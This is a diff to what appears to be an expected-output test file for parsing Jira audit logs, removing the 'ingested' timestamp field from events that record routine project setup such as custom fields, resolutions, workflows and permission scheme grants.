@@ -2239,7 +2209,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169954331Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10110\",\"name\":\"Rank\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Rank\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Global rank field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Global Rank\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":794000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2314,7 +2283,6 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-24T00:58:20.169955062Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Story\",\"type\":\"ISSUE_TYPE\"}],\"auditType\":{\"action\":\"Issue type created\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"issue types\",\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539629,\"nano\":37000000},\"version\":\"1.0\"}", "type": [ "creation" 
@@ -2377,7 +2345,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169955806Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10111\",\"name\":\"Story Points\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Story Points\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Measurement of complexity and/or size of a requirement.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Number Field\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539629,\"nano\":88000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2452,7 +2419,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:20.169956543Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Done\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"Work has been completed on this issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":534000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2517,7 +2483,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:20.169957426Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Won't Do\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"This issue won't be actioned.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":535000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2582,7 +2547,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:20.169958174Z", "original": "{\"affectedObjects\":[{\"id\":\"10002\",\"name\":\"Duplicate\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"The problem is a duplicate of an existing issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":536000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2647,7 +2611,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:20.169958956Z", "original": "{\"affectedObjects\":[{\"id\":\"10003\",\"name\":\"Cannot Reproduce\",\"type\":\"RESOLUTION\"}],\"auditType\":{\"action\":\"New resolution created\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Description\",\"nameI18nKey\":\"common.concepts.description\",\"value\":\"All attempts at reproducing this issue failed, or not enough information was available to reproduce the issue. Reading the code produces no clues as to why this behavior would occur. If more information appears later, please reopen the issue.\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":537000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2712,7 +2675,6 @@ }, "event": { "action": "jira.auditing.workflow.created", - "ingested": "2021-12-24T00:58:20.169959724Z", "original": "{\"affectedObjects\":[{\"id\":\"Software Simplified Workflow for Project TEST\",\"name\":\"Software Simplified Workflow for Project TEST\",\"type\":\"WORKFLOW\"}],\"auditType\":{\"action\":\"Workflow created\",\"actionI18nKey\":\"jira.auditing.workflow.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"admin.workflowtransition.transition\",\"key\":\"Transition\",\"to\":\"Create (To Do), To Do (To Do), In Progress (In Progress), Done (Done)\"},{\"i18nKey\":\"common.words.status\",\"key\":\"Status\",\"to\":\"To Do, In Progress, Done\"},{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Software Simplified Workflow for Project TEST\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow is managed internally by Jira Software. Do not manually modify this workflow.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":710000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2792,7 +2754,6 @@ }, "event": { "action": "jira.auditing.workflow.scheme.created", - "ingested": "2021-12-24T00:58:20.169960475Z", "original": "{\"affectedObjects\":[{\"id\":\"10100\",\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Workflow scheme created\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"TEST: Software Simplified Workflow Scheme\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow scheme is managed internally by Jira Software. Do not manually modify this workflow scheme.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":732000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2862,7 +2823,6 @@ }, "event": { "action": "jira.auditing.workflow.scheme.added.to.project", - "ingested": "2021-12-24T00:58:20.169961330Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"10100\",\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Workflow scheme added to project\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.added.to.project\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"workflows\",\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":746000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2925,7 +2885,6 @@ }, "event": { "action": "jira.auditing.filter.created", - "ingested": "2021-12-24T00:58:20.169962059Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Filter for TEST board\",\"type\":\"FILTER\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Filter created\",\"actionI18nKey\":\"jira.auditing.filter.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"filters\",\"categoryI18nKey\":\"jira.auditing.category.filters\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Filter for TEST board\"},{\"from\":\"\",\"i18nKey\":\"common.concepts.description\",\"key\":\"Description\"},{\"from\":\"\",\"i18nKey\":\"common.concepts.owner\",\"key\":\"Owner\",\"to\":\"test.user\"},{\"from\":\"[]\",\"i18nKey\":\"common.concepts.shared.with\",\"key\":\"Shared with\",\"to\":\"[Project: test (VIEW)]\"},{\"from\":\"\",\"i18nKey\":\"jira.jql.query\",\"key\":\"JQL Query\",\"to\":\"{project = \\\"TEST\\\"} order by Rank ASC\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539713,\"nano\":887000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3020,7 +2979,6 @@ }, "event": { "action": "Board created", - "ingested": "2021-12-24T00:58:20.169962893Z", "original": "{\"affectedObjects\":[{\"id\":\"1\",\"name\":\"TEST board\",\"type\":\"BOARD\"},{\"id\":\"1\",\"name\":\"TEST board\",\"type\":\"BOARD\"}],\"auditType\":{\"action\":\"Board created\",\"actionI18nKey\":\"Board created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"boards\",\"categoryI18nKey\":\"jira.auditing.category.boards\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":72000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3083,7 +3041,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.created", - "ingested": "2021-12-24T00:58:20.169963686Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme created\",\"actionI18nKey\":\"jira.auditing.permission.scheme.created\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Default software scheme\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Default scheme for Software projects.\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":142000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3153,7 +3110,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169964409Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Projects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":151000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3223,7 +3179,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169965156Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":163000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3293,7 +3248,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169965886Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":165000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3363,7 +3317,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169966621Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Assign Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":166000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3433,7 +3386,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169967408Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Resolve Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":168000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3503,7 +3455,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169968139Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Add Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":171000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3573,7 +3524,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169968870Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":173000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -3648,7 +3598,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169969767Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Assignable User\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":174000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -3718,7 +3667,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169970547Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Close Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":176000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -3788,7 +3736,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169971332Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":178000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -3858,7 +3805,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169972079Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Work On Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":180000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -3928,7 +3874,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169972878Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Link Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":182000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -3998,7 +3943,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169973672Z",
